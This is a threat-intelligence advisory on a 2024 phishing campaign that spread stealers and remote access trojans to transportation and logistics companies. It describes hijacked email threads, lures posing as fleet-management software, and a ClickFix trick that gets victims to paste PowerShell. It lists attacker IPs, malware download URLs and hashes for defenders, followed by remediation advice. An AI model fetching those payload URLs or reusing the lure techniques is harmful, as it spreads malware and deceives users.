Analysis Summary

A recent phishing campaign targeting transportation and logistics organizations in North America aims to infect them with various remote access trojans (RATs) and information stealers.

According to the researchers, the activity cluster inserts malicious content into ongoing email exchanges by using legitimate email accounts that have been hijacked and belong to shipping and transportation organizations. It has been determined that the campaign involved the use of up to 15 compromised email accounts. Currently, neither the method nor the identity of the threat actors behind these attacks is known.

From May to July 2024, the majority of the activity delivered Lumma Stealer, StealC, or NetSupport. The threat actor modified its strategy in August 2024 by utilizing new infrastructure, a different delivery method, and more payloads to distribute Arechclient2 and DanaBot. The attack chains entail sending messages with Google Drive URLs or internet shortcut (.URL) attachments that point to a .URL file that, when opened, employs Server Message Block (SMB) to download the malware-containing next-stage payload from a remote location.

Certain campaign variations that were noticed in August 2024 have also adapted to exploit a newly popular method known as ClickFix, which deceives victims into downloading the DanaBot malware by pretending to fix a problem with the way document content appears in web browsers. This is specifically telling people to copy and paste a PowerShell script that is encoded with Base64 into the terminal to start the infection process.

The software that would solely be utilized in fleet operations management and transportation, Samsara, AMB Logistic, and Astra TMS, have all been impersonated in these efforts. The threat actor most likely does research on the targeted company's operations before sending campaigns, based on the focused company's operations being specifically targeted and compromised, the use of lures that impersonate software specifically designed for fleet management and freight operations, and other factors.

Anger Stealer, BLX Stealer (also known as XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a variant of CryptBot called Yet Another Silly Stealer (YASS) are among the stealer malware strains that have surfaced recently. It also coincides with the appearance of a new RomCom RAT version, dubbed SnipBot, which is disseminated through phishing emails that contain phony links. SnipBot is the replacement for PEAPOD (also known as RomCom 4.0). The researchers first brought attention to a few campaign elements in July 2024.

The cybersecurity researchers noted that although ransomware deployments have occurred in the past on RomCom-infected systems, this behavior has not occurred. This suggests that the threat posed by Tropical Scorpius (also known as Void Rabisu), the malware's source, has changed from being solely focused on financial gain to espionage.

Impact

• Identity Theft
• Unauthorized Remote Access
• Sensitive Data Theft

Indicators of Compromise

IP

• 89.23.98.98
• 185.217.197.84

URL

• http://89.23.98.98/file/14242.exe
• http://89.23.98.98/file/ratecon.exe
• http://89.23.98.98/file/rate_confirmation.vbs
• http://89.23.98.98/file/Rateconfirm.exe
• http://89.23.98.98/file/carrier.exe
• http://185.217.197.84/file/remittance.exe
• http://185.217.197.84/file/information_package.exe
• https://live-samsaratrucking.com/true-tracking-32934.html
• http://ambcrrm.com/
• https://ambccm.com/Astra/index.html
• https://idessit.com/fn.msi
• https://ambccm.com/3.msi
• https://ambcrrm.com/3.msi

MD5

• de312520b9a2bdd14f9d1c17e3af48ac
• bba153936ae70773a3bbfab18442a6f4
• 46f9743df7663061efa5e2daf2724cca
• ddbe8350a084515886e55906a46a6647
• 792c4adf6d9e335566b886ddd936c1c2
• 141c941121cc06659813a660eddcd329
• e62a8580edcb1395fba0d845e539c47b
• dcdcea989b87f5e81a389d28628f851c
• 6bc398dba59c8d162ee858b7b199f81d
• b879d804f59086a464dc2bb22a4f5406
• 1ce8e7f90707058eec8757de0deaa76e
• 176ee400a32844237812a1cc6c77c2d3
• 7958277851b8041794467270de27091e
• acb755d083c876f6a80105c17cc61754

SHA-256

• 199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431
• ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e
• e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842
• f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f
• 0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2
• 582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04
• 957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d
• 2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319
• d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d
• fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7
• 163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a
• 37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235
• 1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3
• b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86

SHA1

• 4489a6663bb96e5ff0e64993d520c93ffcf13467
• 2f5631ffc36430f9a74f013c072bbbab61eef296
• a42f532aa297448ff73b4a5568343872cda82503
• 040d7bcb15677c6c3cc95e9c765ee90bb1460c58
• 86c0f9d8bf6f06eb71ee194ef3e8ff78630e7aa7
• b44e2e4875f5488de208b7cfd6f3626ea050b8eb
• 61a029bc45f01013015e9ea30120fcf135e1c236
• d97d5c2e17bcf98075e7c9d615697727c35179fe
• 6fdb6f50f4ad693c64b72a76a970fc93916b3655
• ea1f77423706211132d148e58188823006589aa2
• d2e45018a2428d8b7729a75836499a4f55cdbcdf
• b3e13c9f47f522bfac53b5e53fa3fb3bf4729b1d
• 5c2c885a7049bd96747e20010a2fa6bcbeba5bd3
• 8ccfc2b30402e76a59ed07873b0ccf589728fd22

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
• Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
• Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
• Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
• Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
• Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
• Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
• Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.